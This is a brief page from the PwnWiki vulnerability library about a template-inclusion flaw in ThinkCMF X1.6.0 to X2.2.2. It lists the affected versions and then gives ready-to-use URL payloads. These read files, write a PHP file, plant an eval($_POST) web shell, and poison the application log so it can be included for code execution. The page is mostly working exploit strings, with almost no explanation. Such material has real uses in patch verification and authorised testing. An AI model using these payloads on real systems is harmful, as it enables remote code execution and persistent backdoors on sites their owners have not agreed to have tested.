免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
影响版本
ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2
Payload
?a=display&templateFile=README.md
Payload (文件写入)
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>
Getshell
?a=display&templateFile=<?php file_put_contents('shell.php','<?php+eval($_POST"6666");?>');die();?>
http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
http://target.domain/?a=display&templateFile=<?php eval($_POST"6666");?> http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
免费、自由、人人可编辑的漏洞库
